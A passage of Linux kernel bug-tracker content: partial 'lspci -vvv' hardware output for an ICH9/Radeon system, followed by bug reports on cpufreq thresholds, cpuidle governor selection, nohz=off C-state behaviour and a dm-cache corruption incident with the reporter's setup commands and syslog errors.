WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Capabilities: [180 v1] Root Complex Link Desc: PortNumber=01 ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c000 Kernel driver in use: pcieport 00:1c.1 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 2 (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 I/O behind bridge: 00005000-00005fff Memory behind bridge: d0500000-d05fffff Prefetchable memory behind bridge: 00000000d0a00000-00000000d0bfffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #2, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;1us, L1 &lt;4us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x0, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Slot #2, PowerLimit 10.000W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet- Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0300c Data: 41d1 Capabilities: [90] Subsystem: Intel Corporation 82801I (ICH9 Family) PCI Express Port 2 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed+ WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Capabilities: [180 v1] Root Complex Link Desc: PortNumber=02 ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c000 Kernel driver in use: pcieport 00:1c.2 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 3 (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=04, subordinate=04, sec-latency=0 I/O behind bridge: 00001000-00001fff Memory behind bridge: d0100000-d01fffff Prefetchable memory behind bridge: 00000000d0c00000-00000000d0dfffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #3, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;256ns, L1 &lt;4us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Slot #3, PowerLimit 10.000W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet+ LinkState+ RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0300c Data: 41e1 Capabilities: [90] Subsystem: Intel Corporation 82801I (ICH9 Family) PCI Express Port 3 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed+ WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Capabilities: [180 v1] Root Complex Link Desc: PortNumber=03 ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c000 Kernel driver in use: pcieport 00:1c.3 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 4 (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=05, subordinate=05, sec-latency=0 I/O behind bridge: 00006000-00006fff Memory behind bridge: d0600000-d06fffff Prefetchable memory behind bridge: 00000000d0e00000-00000000d0ffffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #4, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;1us, L1 &lt;4us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x0, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Slot #4, PowerLimit 10.000W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet- Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0300c Data: 4122 Capabilities: [90] Subsystem: Intel Corporation 82801I (ICH9 Family) PCI Express Port 4 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed+ WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Capabilities: [180 v1] Root Complex Link Desc: PortNumber=04 ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c000 Kernel driver in use: pcieport 00:1c.4 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 5 (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=06, subordinate=06, sec-latency=0 I/O behind bridge: 00007000-00007fff Memory behind bridge: d0700000-d07fffff Prefetchable memory behind bridge: 00000000d1000000-00000000d11fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #5, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;1us, L1 &lt;4us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x0, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Slot #5, PowerLimit 10.000W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet- Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0300c Data: 4142 Capabilities: [90] Subsystem: Intel Corporation 82801I (ICH9 Family) PCI Express Port 5 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed+ WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Capabilities: [180 v1] Root Complex Link Desc: PortNumber=05 ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c000 Kernel driver in use: pcieport 00:1d.0 USB controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #1 (rev 02) (prog-if 00 [UHCI]) Subsystem: Intel Corporation Device 4f4a Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 23 Region 4: I/O ports at 3080 [size=32] Capabilities: [50] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: uhci_hcd 00:1d.1 USB controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #2 (rev 02) (prog-if 00 [UHCI]) Subsystem: Intel Corporation Device 4f4a Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at 3060 [size=32] Capabilities: [50] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: uhci_hcd 00:1d.2 USB controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #3 (rev 02) (prog-if 00 [UHCI]) Subsystem: Intel Corporation Device 4f4a Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin C routed to IRQ 18 Region 4: I/O ports at 3040 [size=32] Capabilities: [50] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: uhci_hcd 00:1d.7 USB controller: Intel Corporation 82801I (ICH9 Family) USB2 EHCI Controller #1 (rev 02) (prog-if 20 [EHCI]) Subsystem: Intel Corporation Device 4f4a Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 23 Region 0: Memory at d0325800 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Debug port: BAR=1 offset=00a0 Capabilities: [98] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: ehci-pci 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev 92) (prog-if 01 [Subtractive decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Bus: primary=00, secondary=07, subordinate=07, sec-latency=32 I/O behind bridge: 0000f000-00000fff Memory behind bridge: d0000000-d00fffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [50] Subsystem: Intel Corporation Device 4f4a 00:1f.0 ISA bridge: Intel Corporation 82801IO (ICH9DO) LPC Interface Controller (rev 02) Subsystem: Intel Corporation Device 4f4a Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [e0] Vendor Specific Information: Len=0c &lt;?&gt; Kernel driver in use: lpc_ich 00:1f.2 SATA controller: Intel Corporation 82801IR/IO/IH (ICH9R/DO/DH) 6 port SATA Controller [AHCI mode] (rev 02) (prog-if 01 [AHCI 1.0]) Subsystem: Intel Corporation Device 4f4a Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 46 Region 0: I/O ports at 3428 [size=8] Region 1: I/O ports at 3434 [size=4] Region 2: I/O ports at 3420 [size=8] Region 3: I/O ports at 3430 [size=4] Region 4: I/O ports at 3020 [size=32] Region 5: Memory at d0325000 (32-bit, non-prefetchable) [size=2K] Capabilities: [80] MSI: Enable+ Count=1/16 Maskable- 64bit- Address: fee0200c Data: 4152 Capabilities: [70] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold-) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [a8] SATA HBA v1.0 BAR4 Offset=00000004 Capabilities: [b0] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: ahci 00:1f.3 SMBus: Intel Corporation 82801I (ICH9 Family) SMBus Controller (rev 02) Subsystem: Intel Corporation Device 4f4a Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin B routed to IRQ 18 Region 0: Memory at d0326000 (64-bit, non-prefetchable) [size=256] Region 4: I/O ports at 3000 [size=32] Kernel driver in use: i801_smbus 01:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] Turks PRO [Radeon HD 6570/7570] (prog-if 00 [VGA controller]) Subsystem: PC Partner Limited / Sapphire Technology Device e193 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 47 Region 0: Memory at c0000000 (64-bit, prefetchable) [size=256M] Region 2: Memory at d0200000 (64-bit, non-prefetchable) [size=128K] Region 4: I/O ports at 2000 [size=256] Expansion ROM at d0240000 [disabled] [size=128K] Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Express (v2) Legacy Endpoint, MSI 00 DevCap: MaxPayload 256 bytes, PhantFunc 0, Latency L0s &lt;4us, L1 unlimited ExtTag+ AttnBtn- AttnInd- PwrInd- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag+ PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 512 bytes DevSta: CorrErr+ UncorrErr- FatalErr- UnsuppReq+ AuxPwr- TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x16, ASPM L0s L1, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x16, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- DevCap2: Completion Timeout: Not Supported, TimeoutDis-, LTR-, OBFF Not Supported DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis-, LTR-, OBFF Disabled LnkCtl2: Target Link Speed: 2.5GT/s, EnterCompliance- SpeedDis- Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -6dB, EqualizationComplete-, EqualizationPhase1- EqualizationPhase2-, EqualizationPhase3-, LinkEqualizationRequest- Capabilities: [a0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0100c Data: 4162 Capabilities: [100 v1] Vendor Specific Information: ID=0001 Rev=1 Len=010 &lt;?&gt; Capabilities: [150 v1] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UESvrt: DLP+ SDES+ TLP- FCP+ CmpltTO- CmpltAbrt- UnxCmplt- RxOF+ MalfTLP+ ECRC- UnsupReq- ACSViol- CESta: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ CEMsk: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ AERCap: First Error Pointer: 00, GenCap+ CGenEn- ChkCap+ ChkEn- Kernel driver in use: radeon 01:00.1 Audio device: Advanced Micro Devices, Inc. [AMD/ATI] Turks/Whistler HDMI Audio [Radeon HD 6000 Series] Subsystem: PC Partner Limited / Sapphire Technology Device aa90 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 51 Region 0: Memory at d0220000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Express (v2) Legacy Endpoint, MSI 00 DevCap: MaxPay</t>
  </si>
  <si>
    <t>Blind angle of 1% between up_threshold and down_threshold</t>
  </si>
  <si>
    <t>3.12.0-3.9</t>
  </si>
  <si>
    <t>2013-11-22 14:53 UTC</t>
  </si>
  <si>
    <t>sworddragon2</t>
  </si>
  <si>
    <t>2016-10-10 11:12 UTC</t>
  </si>
  <si>
    <t>Chen Yu</t>
  </si>
  <si>
    <t>The lowest value that /sys/devices/system/cpu/cpufreq/ondemand/up_threshold can contain is 11 while the implicit configuration down_threshold will be statically set to 10. But I'm thinking that it would be correct if up_threshold could be set to 10 too as this wouldn't cause any collision. up_threshold would scale if the cpu core reaches 10% or more of cpu usage (&gt;=) and down_threshold would scale if the cpu core reaches less than 10% of cpu usage (&lt;).</t>
  </si>
  <si>
    <t>Cpuidle governor menu selected despite NO_HZ not being enabled</t>
  </si>
  <si>
    <t>2013-11-22 18:10 UTC</t>
  </si>
  <si>
    <t>2016-05-16 22:15 UTC</t>
  </si>
  <si>
    <t>When NO_HZ is not enabled, the ladder cpuidle governor is supposed to perform better than the menu governor. However the kernel still selects the menu governor by default in that case.</t>
  </si>
  <si>
    <t>Booting with nohz=off breaks the menu cpuidle governor</t>
  </si>
  <si>
    <t>2013-11-22 18:12 UTC</t>
  </si>
  <si>
    <t>2014-11-03 22:45 UTC</t>
  </si>
  <si>
    <t>A NO_HZ kernel booted with nohz=off behaves differently than a kernel built without NO_HZ with regards to cpuidle. Both use the "menu" governor by default, but in the latter case deep C states are reached while in the former they never are.</t>
  </si>
  <si>
    <t>corruption of dm-cache volume, data loss on source volume</t>
  </si>
  <si>
    <t>2013-11-24 18:49 UTC</t>
  </si>
  <si>
    <t>Nik Martin</t>
  </si>
  <si>
    <t>2015-11-10 02:57 UTC</t>
  </si>
  <si>
    <t>Mike Snitzer</t>
  </si>
  <si>
    <t>First, my configuration: - Brand new computer, built by myself 1 day ago with all new components - I built a new kernel using mainline kernel source. - My storage setup is a 2TB SATA drive, with a layout like: Filesystem Size Used Avail Use% Mounted on rootfs 9.7G 375M 8.9G 4% / udev 10M 0 10M 0% /dev tmpfs 790M 484K 789M 1% /run /dev/mapper/nik--deb-root 9.7G 375M 8.9G 4% / tmpfs 5.0M 0 5.0M 0% /run/lock tmpfs 1.6G 2.3M 1.6G 1% /run/shm /dev/sda1 228M 28M 189M 13% /boot /dev/mapper/nik--deb-home 394G 60G 315G 16% /home /dev/mapper/nik--deb-tmp 360M 2.2M 335M 1% /tmp /dev/mapper/nik--deb-usr 8.2G 3.9G 3.9G 51% /usr /dev/mapper/nik--deb-var 2.7G 1.2G 1.5G 45% /var - I built a cache for /dev/mapper/nik--deb-home - I have a 120 GB Kingston SSD drive that I partitioned using GPT, and then created a 8 GB raw, unformatted partition - I built a metadata and cache lvm partition on this 8 gb partition, using this configuration: blockdev --getsize64 /dev/disk/by-id/scsi-SATA_KINGSTON_SV300S50026B773A0229EB-part1 dmsetup dmsetup create ssd-metadata --table '0 9216 linear /dev/disk/by-id/scsi-SATA_KINGSTON_SV300S50026B773A0229EB-part1 0' dd if=/dev/zero of=/dev/mapper/ssd-metadata dmsetup create ssd-blocks --table '0 16768000 linear /dev/disk/by-id/scsi-SATA_KINGSTON_SV300S50026B773A0229EB-part1 9216' blockdev --getsz /dev/nik-deb/home dmsetup create home-cached --table '0 838860800 cache /dev/mapper/ssd-metadata /dev/mapper/ssd-blocks /dev/nik-deb/home 512 1 writeback default 0' I then remounted /home onto /dev/mapper/home-cached, and everything started worked with no issues or errors. I then started to do a little workload testing of the processes I wanted to speed up with caching, which is android development/compiling/packaging, etc. I did a few compiles, then did a clean and rebuild of my application, which should have put a little stress on the cache. after doing this a few times, my compiler locked up. I dropped to a root shell and looked at syslog, and saw this: Nov 24 11:48:05 nik-deb kernel: [40283.519322] device-mapper: space map metadata: unable to allocate new metadata block Nov 24 11:48:05 nik-deb kernel: [40283.519366] attempt to access beyond end of device Nov 24 11:48:05 nik-deb kernel: [40283.519368] dm-6: rw=1, want=561160, limit=9216 Nov 24 